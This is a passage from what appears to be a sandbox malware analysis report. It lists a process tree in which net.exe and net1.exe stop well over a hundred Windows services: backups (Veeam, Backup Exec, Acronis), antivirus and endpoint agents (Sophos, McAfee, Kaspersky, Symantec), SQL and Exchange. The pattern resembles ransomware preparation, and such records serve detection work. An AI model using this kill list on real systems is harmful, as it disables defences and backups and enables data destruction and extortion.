        PID:4032
    • C:\Windows\system32\net.exe
      "net.exe" stop “Veeam Backup Catalog Data Service” /y
      PID:1624
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop “Veeam Backup Catalog Data Service” /y
        PID:3784
    • C:\Windows\system32\net.exe
      "net.exe" stop ReportServer$TPS /y
      PID:2436
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop ReportServer$TPS /y
        PID:3724
    • C:\Windows\system32\net.exe
      "net.exe" stop “Sophos File Scanner Service” /y
      PID:1640
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop “Sophos File Scanner Service” /y
        PID:3676
    • C:\Windows\system32\net.exe
      "net.exe" stop MSExchangeSA /y
      PID:2292
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop MSExchangeSA /y
        PID:3664
    • C:\Windows\system32\net.exe
      "net.exe" stop UI0Detect /y
      PID:1644
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop UI0Detect /y
        PID:3868
    • C:\Windows\system32\net.exe
      "net.exe" stop MSOLAP$SQL_2008 /y
      PID:572
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop MSOLAP$SQL_2008 /y
        PID:2548
    • C:\Windows\system32\net.exe
      "net.exe" stop “Symantec System Recovery” /y
      PID:2092
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop “Symantec System Recovery” /y
        PID:2264
    • C:\Windows\system32\net.exe
      "net.exe" stop ReportServer$SYSTEM_BGC /y
      PID:916
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop ReportServer$SYSTEM_BGC /y
        PID:3704
    • C:\Windows\system32\net.exe
      "net.exe" stop “Sophos Device Control Service” /y
      PID:1512
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop “Sophos Device Control Service” /y
        PID:2940
    • C:\Windows\system32\net.exe
      "net.exe" stop MSExchangeMTA /y
      PID:1872
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop MSExchangeMTA /y
        PID:3372
    • C:\Windows\system32\net.exe
      "net.exe" stop SstpSvc /y
      PID:2196
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop SstpSvc /y
        PID:4020
    • C:\Windows\system32\net.exe
      "net.exe" stop msftesql$PROD /y
      PID:2156
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop msftesql$PROD /y
        PID:3432
    • C:\Windows\system32\net.exe
      "net.exe" stop “SQLsafe Filter Service” /y
      PID:1716
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop “SQLsafe Filter Service” /y
        PID:3112
    • C:\Windows\system32\net.exe
      "net.exe" stop ReportServer$SQL_2008 /y
      PID:1588
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop ReportServer$SQL_2008 /y
        PID:3964
    • C:\Windows\system32\net.exe
      "net.exe" stop SMTPSvc /y
      PID:840
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop SMTPSvc /y
        PID:3356
    • C:\Windows\system32\net.exe
      "net.exe" stop “Sophos Clean Service” /y
      PID:2248
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop “Sophos Clean Service” /y
        PID:3364
    • C:\Windows\system32\net.exe
      "net.exe" stop MSExchangeMGMT /y
      PID:368
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop MSExchangeMGMT /y
        PID:4048
    • C:\Windows\system32\net.exe
      "net.exe" stop POP3Svc /y
      PID:2076
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop POP3Svc /y
        PID:3288
    • C:\Windows\system32\net.exe
      "net.exe" stop MsDtsServer110 /y
      PID:2104
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop MsDtsServer110 /y
        PID:4004
    • C:\Windows\system32\net.exe
      "net.exe" stop “SQLsafe Backup Service” /y
      PID:2148
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop “SQLsafe Backup Service” /y
        PID:2392
    • C:\Windows\system32\net.exe
      "net.exe" stop ReportServer /y
      PID:2096
    • C:\Windows\system32\net.exe
      "net.exe" stop SamSs /y
      PID:2056
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop SamSs /y
        PID:3512
    • C:\Windows\system32\net.exe
      "net.exe" stop “Sophos AutoUpdate Service” /y
      PID:2108
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop “Sophos AutoUpdate Service” /y
        PID:2780
    • C:\Windows\system32\net.exe
      "net.exe" stop MSExchangeIS /y
      PID:2080
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop MSExchangeIS /y
        PID:3448
    • C:\Windows\system32\net.exe
      "net.exe" stop NetMsmqActivator /y
      PID:320
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop NetMsmqActivator /y
        PID:1356
    • C:\Windows\system32\net.exe
      "net.exe" stop MsDtsServer100 /y
      PID:3064
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop MsDtsServer100 /y
        PID:3148
    • C:\Windows\system32\net.exe
      "net.exe" stop “SQL Backups /y
      PID:3056
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop “SQL Backups /y
        PID:3464
    • C:\Windows\system32\net.exe
      "net.exe" stop “Enterprise Client Service” /y
      PID:3048
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop “Enterprise Client Service” /y
        PID:2388
    • C:\Windows\system32\net.exe
      "net.exe" stop EraserSvc11710 /y
      PID:3040
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop EraserSvc11710 /y
        PID:3416
    • C:\Windows\system32\net.exe
      "net.exe" stop “Sophos Agent” /y
      PID:3032
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop “Sophos Agent” /y
        PID:4028
    • C:\Windows\system32\net.exe
      "net.exe" stop MSExchangeES /y
      PID:3024
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop MSExchangeES /y
        PID:3524
    • C:\Windows\system32\net.exe
      "net.exe" stop IISAdmin /y
      PID:3016
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop IISAdmin /y
        PID:2700
    • C:\Windows\system32\net.exe
      "net.exe" stop MsDtsServer /y
      PID:3008
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop MsDtsServer /y
        PID:3620
    • C:\Windows\system32\net.exe
      "net.exe" stop “Acronis VSS Provider” /y
      PID:2992
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop “Acronis VSS Provider” /y
        PID:3504
    • C:\Windows\system32\net.exe
      "net.exe" stop sophos /y
      PID:2984
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop sophos /y
        PID:3936
    • C:\Windows\system32\net.exe
      "net.exe" stop CAARCUpdateSvc /y
      PID:2976
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop CAARCUpdateSvc /y
        PID:3600
    • C:\Windows\system32\net.exe
      "net.exe" stop CASAD2DWebSvc /y
      PID:2968
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop CASAD2DWebSvc /y
        PID:4000
    • C:\Windows\system32\net.exe
      "net.exe" stop AcronisAgent /y
      PID:2960
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop AcronisAgent /y
        PID:3576
    • C:\Windows\system32\net.exe
      "net.exe" stop AcrSch2Svc /y
      PID:2952
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop AcrSch2Svc /y
        PID:2488
    • C:\Windows\system32\net.exe
      "net.exe" stop BackupExecRPCService /y
      PID:2944
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop BackupExecRPCService /y
        PID:3404
    • C:\Windows\system32\net.exe
      "net.exe" stop BackupExecManagementService /y
      PID:2936
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop BackupExecManagementService /y
        PID:4020
    • C:\Windows\system32\net.exe
      "net.exe" stop “Sophos Web Control Service” /y
      PID:3140
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop “Sophos Web Control Service” /y
        PID:3200
    • C:\Windows\system32\net.exe
      "net.exe" stop BackupExecJobEngine /y
      PID:2928
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop BackupExecJobEngine /y
        PID:3304
    • C:\Windows\system32\net.exe
      "net.exe" stop BackupExecAgentBrowser /y
      PID:2912
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop BackupExecAgentBrowser /y
        PID:3324
    • C:\Windows\system32\net.exe
      "net.exe" stop BackupExecAgentAccelerator /y
      PID:2904
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop BackupExecAgentAccelerator /y
        PID:2572
    • C:\Windows\system32\net.exe
      "net.exe" stop BackupExecVSSProvider /y
      PID:2896
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop BackupExecVSSProvider /y
        PID:3380
    • C:\Windows\system32\net.exe
      "net.exe" stop PDVFSService /y
      PID:2888
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop PDVFSService /y
        PID:2616
    • C:\Windows\system32\net.exe
      "net.exe" stop veeam /y
      PID:2880
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop veeam /y
        PID:3176
    • C:\Windows\system32\net.exe
      "net.exe" stop VeeamNFSSvc /y
      PID:2872
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop VeeamNFSSvc /y
        PID:2652
    • C:\Windows\system32\net.exe
      "net.exe" stop VeeamDeploymentService /y
      PID:2864
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop VeeamDeploymentService /y
        PID:2424
    • C:\Windows\system32\net.exe
      "net.exe" stop VeeamTransportSvc /y
      PID:2856
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop VeeamTransportSvc /y
        PID:2680
    • C:\Windows\system32\net.exe
      "net.exe" stop MSSQLFDLauncher$PROFXENGAGEMENT /y
      PID:2844
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop MSSQLFDLauncher$PROFXENGAGEMENT /y
        PID:2404
    • C:\Windows\system32\net.exe
      "net.exe" stop SQLAgent$VEEAMSQL2008R2 /y
      PID:2836
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2008R2 /y
        PID:1708
    • C:\Windows\system32\net.exe
      "net.exe" stop FA_Scheduler /y
      PID:2828
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop FA_Scheduler /y
        PID:1584
    • C:\Windows\system32\net.exe
      "net.exe" stop MSSQL$VEEAMSQL2012 /y
      PID:2820
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop MSSQL$VEEAMSQL2012 /y
        PID:4048
    • C:\Windows\system32\net.exe
      "net.exe" stop SDRSVC /y
      PID:2812
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop SDRSVC /y
        PID:3284
    • C:\Windows\system32\net.exe
      "net.exe" stop ESHASRV /y
      PID:2804
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop ESHASRV /y
        PID:2136
    • C:\Windows\system32\net.exe
      "net.exe" stop MSSQL$VEEAMSQL2008R2 /y
      PID:2796
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop MSSQL$VEEAMSQL2008R2 /y
        PID:2552
    • C:\Windows\system32\net.exe
      "net.exe" stop PDVFSService /y
      PID:2788
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop PDVFSService /y
        PID:2320
    • C:\Windows\system32\net.exe
      "net.exe" stop EsgShKernel /y
      PID:2776
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop EsgShKernel /y
        PID:2696
    • C:\Windows\system32\net.exe
      "net.exe" stop MSSQL$TPSAMA /y
      PID:2768
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop MSSQL$TPSAMA /y
        PID:2264
    • C:\Windows\system32\net.exe
      "net.exe" stop ntrtscan /y
      PID:2760
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop ntrtscan /y
        PID:3988
    • C:\Windows\system32\net.exe
      "net.exe" stop EPUpdateService /y
      PID:2752
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop EPUpdateService /y
        PID:2352
    • C:\Windows\system32\net.exe
      "net.exe" stop MSSQL$TPS /y
      PID:2744
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop MSSQL$TPS /y
        PID:1520
    • C:\Windows\system32\net.exe
      "net.exe" stop MSSQL$VEEAMSQL2008R2 /y
      PID:2736
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop MSSQL$VEEAMSQL2008R2 /y
        PID:2340
    • C:\Windows\system32\net.exe
      "net.exe" stop YooBackup /y
      PID:2720
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop YooBackup /y
        PID:3944
    • C:\Windows\system32\net.exe
      "net.exe" stop VSNAPVSS /y
      PID:2644
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop VSNAPVSS /y
        PID:4012
    • C:\Windows\system32\net.exe
      "net.exe" stop QBCFMonitorService /y
      PID:2612
    • C:\Windows\system32\net.exe
      "net.exe" stop QBIDPService /y
      PID:2408
    • C:\Windows\system32\net.exe
      "net.exe" stop mfewc /y
      PID:2120
    • C:\Windows\system32\net.exe
      "net.exe" stop MSSQLFDLauncher$SQL_2008 /y
      PID:3888
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop MSSQLFDLauncher$SQL_2008 /y
        PID:3268
    • C:\Windows\system32\net.exe
      "net.exe" stop KAVFS /y
      PID:3648
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop KAVFS /y
        PID:3008
    • C:\Windows\system32\net.exe
      "net.exe" stop MBAMService /y
      PID:2956
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop MBAMService /y
        PID:4360
    • C:\Windows\system32\net.exe
      "net.exe" stop MSSQLFDLauncher$SBSMONITORING /y
      PID:3628
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop MSSQLFDLauncher$SBSMONITORING /y
        PID:3212
    • C:\Windows\system32\net.exe
      "net.exe" stop SQLWriter /y
      PID:3784
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop SQLWriter /y
        PID:4300
    • C:\Windows\system32\net.exe
      "net.exe" stop SQLAgent$TPS /y
      PID:3744
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop SQLAgent$TPS /y
        PID:4072
    • C:\Windows\system32\net.exe
      "net.exe" stop swi_filter /y
      PID:3492
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop swi_filter /y
        PID:4232
    • C:\Windows\system32\net.exe
      "net.exe" stop SQLAgent$SYSTEM_BGC /y
      PID:2980
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop SQLAgent$SYSTEM_BGC /y
        PID:4088
    • C:\Windows\system32\net.exe
      "net.exe" stop svcGenericHost /y
      PID:1064
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop svcGenericHost /y
        PID:2632
    • C:\Windows\system32\net.exe
      "net.exe" stop SQLAgent$SQLEXPRESS /y
      PID:3876
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop SQLAgent$SQLEXPRESS /y
        PID:3080
    • C:\Windows\system32\net.exe
      "net.exe" stop SQLAgent$SOPHOS /y
      PID:3620
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop SQLAgent$SOPHOS /y
        PID:4224
    • C:\Windows\system32\net.exe
      "net.exe" stop SQLAgent$SQL_2008 /y
      PID:3656
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop SQLAgent$SQL_2008 /y
        PID:4080
    • C:\Windows\system32\net.exe
      "net.exe" stop sophossps /y
      PID:3836
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop sophossps /y
        PID:3840
    • C:\Windows\system32\net.exe
      "net.exe" stop SQLAgent$SHAREPOINT /y
      PID:2144
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop SQLAgent$SHAREPOINT /y
        PID:2988
    • C:\Windows\system32\net.exe
      "net.exe" stop SntpService /y
      PID:3584
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop SntpService /y
        PID:4272
    • C:\Windows\system32\net.exe
      "net.exe" stop SQLAgent$SBSMONITORING /y
      PID:3576
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop SQLAgent$SBSMONITORING /y
        PID:3052
    • C:\Windows\system32\net.exe
      "net.exe" stop SmcService /y
      PID:3420
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop SmcService /y
        PID:3120
    • C:\Windows\system32\net.exe
      "net.exe" stop SQLAgent$PROFXENGAGEMENT /y
      PID:3428
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop SQLAgent$PROFXENGAGEMENT /y
        PID:4084
    • C:\Windows\system32\net.exe
      "net.exe" stop Smcinst /y
      PID:3028
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop Smcinst /y
        PID:592
    • C:\Windows\system32\net.exe
      "net.exe" stop SQLAgent$PROD /y
      PID:3512
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop SQLAgent$PROD /y
        PID:4324
    • C:\Windows\system32\net.exe
      "net.exe" stop ShMonitor /y
      PID:3436
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop ShMonitor /y
        PID:4556
    • C:\Windows\system32\net.exe
      "net.exe" stop SQLAgent$PRACTTICEMGT /y
      PID:3556
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop SQLAgent$PRACTTICEMGT /y
        PID:4392
    • C:\Windows\system32\net.exe
      "net.exe" stop SepMasterService /y
      PID:3776
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop SepMasterService /y
        PID:4256
    • C:\Windows\system32\net.exe
      "net.exe" stop SQLAgent$PRACTTICEBGC /y
      PID:3756
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop SQLAgent$PRACTTICEBGC /y
        PID:4248
    • C:\Windows\system32\net.exe
      "net.exe" stop SAVService /y
      PID:3736
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop SAVService /y
        PID:4332
    • C:\Windows\system32\net.exe
      "net.exe" stop SQLAgent$ECWDB2 /y
      PID:3476
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop SQLAgent$ECWDB2 /y
        PID:4308
    • C:\Windows\system32\net.exe
      "net.exe" stop SAVAdminService /y
      PID:3400
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop SAVAdminService /y
        PID:3984
    • C:\Windows\system32\net.exe
      "net.exe" stop SQLAgent$CXDB /y
      PID:3440
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop SQLAgent$CXDB /y
        PID:4468
    • C:\Windows\system32\net.exe
      "net.exe" stop sacsvr /y
      PID:3044
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop sacsvr /y
        PID:4288
    • C:\Windows\system32\net.exe
      "net.exe" stop SQLAgent$CITRIX_METAFRAME /y
      PID:3456
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop SQLAgent$CITRIX_METAFRAME /y
        PID:240
    • C:\Windows\system32\net.exe
      "net.exe" stop MSSQL$SOPHOS /y
      PID:3404
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop MSSQL$SOPHOS /y
        PID:4344
    • C:\Windows\system32\net.exe
      "net.exe" stop SQLAgent$BKUPEXEC /y
      PID:3376
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop SQLAgent$BKUPEXEC /y
        PID:4116
    • C:\Windows\system32\net.exe
      "net.exe" stop sms_site_sql_backup /y
      PID:3396
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop sms_site_sql_backup /y
        PID:1952
    • C:\Windows\system32\net.exe
      "net.exe" stop mfevtp /y
      PID:3604
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop mfevtp /y
        PID:2600
    • C:\Windows\system32\net.exe
      "net.exe" stop RESvc /y
      PID:2072
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop RESvc /y
        PID:4460
    • C:\Windows\system32\net.exe
      "net.exe" stop wbengine /y
      PID:1692
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop wbengine /y
        PID:4152
    • C:\Windows\system32\net.exe
      "net.exe" stop mfemms /y
      PID:3364
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop mfemms /y
        PID:2388
    • C:\Windows\system32\net.exe
      "net.exe" stop ReportServer$SQL_2008 /y
      PID:3380
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop ReportServer$SQL_2008 /y
        PID:4100
    • C:\Windows\system32\net.exe
      "net.exe" stop wbengine /y
      PID:3352
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop wbengine /y
        PID:4180
    • C:\Windows\system32\net.exe
      "net.exe" stop mfefire /y
      PID:3332
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop mfefire /y
        PID:4128
    • C:\Windows\system32\net.exe
      "net.exe" stop OracleClientCache80 /y
      PID:3592
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop OracleClientCache80 /y
        PID:2180
    • C:\Windows\system32\net.exe
      "net.exe" stop VeeamTransportSvc /y
      PID:3312
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop VeeamTransportSvc /y
        PID:3184
    • C:\Windows\system32\net.exe
      "net.exe" stop McTaskManager /y
      PID:3516
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop McTaskManager /y
        PID:4240
    • C:\Windows\system32\net.exe
      "net.exe" stop MySQL80 /y
      PID:3004
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop MySQL80 /y
        PID:3180
    • C:\Windows\system32\net.exe
      "net.exe" stop VeeamRESTSvc /y
      PID:3300
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop VeeamRESTSvc /y
        PID:1048
    • C:\Windows\system32\net.exe
      "net.exe" stop McShield /y
      PID:2848
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop McShield /y
        PID:2256
    • C:\Windows\system32\net.exe
      "net.exe" stop MySQL57 /y
      PID:3168
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop MySQL57 /y
        PID:2060
    • C:\Windows\system32\net.exe
      "net.exe" stop VeeamNFSSvc /y
      PID:3468
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop VeeamNFSSvc /y
        PID:4068
    • C:\Windows\system32\net.exe
      "net.exe" stop McAfeeFrameworkMcAfeeFramework /y
      PID:2424
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop McAfeeFrameworkMcAfeeFramework /y
        PID:2736
    • C:\Windows\system32\net.exe
      "net.exe" stop MSSQLServerOLAPService /y
      PID:2792
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop MSSQLServerOLAPService /y
        PID:2240
    • C:\Windows\system32\net.exe
      "net.exe" stop VeeamMountSvc /y
      PID:2468
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop VeeamMountSvc /y
        PID:2880
    • C:\Windows\system32\net.exe
      "net.exe" stop McAfeeFramework /y
      PID:2892
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop McAfeeFramework /y
        PID:4164
    • C:\Windows\system32\net.exe
      "net.exe" stop MSSQLServerADHelper100 /y
      PID:2564
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop MSSQLServerADHelper100 /y
        PID:4032
    • C:\Windows\system32\net.exe
      "net.exe" stop VeeamHvIntegrationSvc /y
      PID:2860
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop VeeamHvIntegrationSvc /y
        PID:1656
    • C:\Windows\system32\net.exe
      "net.exe" stop McAfeeEngineService /y
      PID:2320
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop McAfeeEngineService /y
        PID:2904
    • C:\Windows\system32\net.exe
      "net.exe" stop MSSQLServerADHelper /y
      PID:2496
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop MSSQLServerADHelper /y
        PID:4264
    • C:\Windows\system32\net.exe
      "net.exe" stop VeeamEnterpriseManagerSvc /y
      PID:3248
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop VeeamEnterpriseManagerSvc /y
        PID:4476
    • C:\Windows\system32\net.exe
      "net.exe" stop MBEndpointAgent /y
      PID:2876
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop MBEndpointAgent /y
        PID:3892
    • C:\Windows\system32\net.exe
      "net.exe" stop MSSQLSERVER /y
      PID:2596
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop MSSQLSERVER /y
        PID:2540
    • C:\Windows\system32\net.exe
      "net.exe" stop VeeamDeploySvc /y
      PID:3232
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop VeeamDeploySvc /y
        PID:4216
    • C:\Windows\system32\net.exe
      "net.exe" stop MSSQLFDLauncher$TPSAMA /y
      PID:2628
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop MSSQLFDLauncher$TPSAMA /y
        PID:2664
    • C:\Windows\system32\net.exe
      "net.exe" stop VeeamDeploymentService /y
      PID:2636
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop VeeamDeploymentService /y
        PID:4384
    • C:\Windows\system32\net.exe
      "net.exe" stop masvc /y
      PID:3108
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop masvc /y
        PID:4208
    • C:\Windows\system32\net.exe
      "net.exe" stop MSSQLFDLauncher$TPS /y
      PID:3276
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop MSSQLFDLauncher$TPS /y
        PID:2248
    • C:\Windows\system32\net.exe
      "net.exe" stop KAVFSGT /y
      PID:3912
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop KAVFSGT /y
        PID:1140
    • C:\Windows\system32\net.exe
      "net.exe" stop VeeamCloudSvc /y
      PID:3256
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop VeeamCloudSvc /y
        PID:3708
    • C:\Windows\system32\net.exe
      "net.exe" stop macmnsvc /y
      PID:988
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop macmnsvc /y
        PID:1768
    • C:\Windows\system32\net.exe
      "net.exe" stop MSSQLFDLauncher$SYSTEM_BGC /y
      PID:2740
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop MSSQLFDLauncher$SYSTEM_BGC /y
        PID:2080
    • C:\Windows\system32\net.exe
      "net.exe" stop VeeamCatalogSvc /y
      PID:2884
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop VeeamCatalogSvc /y
        PID:2220
    • C:\Windows\system32\net.exe
      "net.exe" stop klnagent /y
      PID:2224
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop klnagent /y
        PID:2428
    • C:\Windows\system32\net.exe
      "net.exe" stop BackupExecJobEngine /y
      PID:2340
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop BackupExecJobEngine /y
        PID:1640
    • C:\Windows\system32\net.exe
      "net.exe" stop YooIT /y
      PID:3000
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop YooIT /y
        PID:792
    • C:\Windows\system32\net.exe
      "net.exe" stop MSSQL$PROD /y
      PID:2548
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop MSSQL$PROD /y
        PID:2984
    • C:\Windows\system32\net.exe
      "net.exe" stop VeeamBackupSvc /y
      PID:3980
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop VeeamBackupSvc /y
        PID:652
    • C:\Windows\system32\net.exe
      "net.exe" stop swi_service /y
      PID:2580
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop swi_service /y
        PID:2428
    • C:\Windows\system32\net.exe
      "net.exe" stop zhudongfangyu /y
      PID:2888
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop zhudongfangyu /y
        PID:2156
    • C:\Windows\system32\net.exe
      "net.exe" stop kavfsslp /y
      PID:3596
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop kavfsslp /y
        PID:3924
    • C:\Windows\system32\net.exe
      "net.exe" stop swi_update /y
      PID:4036
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop swi_update /y
        PID:3356
    • C:\Windows\system32\net.exe
      "net.exe" stop TrueKey /y
      PID:2188
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop TrueKey /y
        PID:3392
    • C:\Windows\system32\net.exe
      "net.exe" stop SQLSafeOLRService /y
      PID:4044
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop SQLSafeOLRService /y
        PID:2260
    • C:\Windows\system32\net.exe
      "net.exe" stop tmlisten /y
      PID:3096
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop tmlisten /y
        PID:2068
    • C:\Windows\system32\net.exe
      "net.exe" stop SQLBrowser /y
      PID:2648
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop SQLBrowser /y
        PID:3752
    • C:\Windows\system32\net.exe
      "net.exe" stop TmCCSF /y
      PID:2824
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop TmCCSF /y
        PID:3884
    • C:\Windows\system32\net.exe
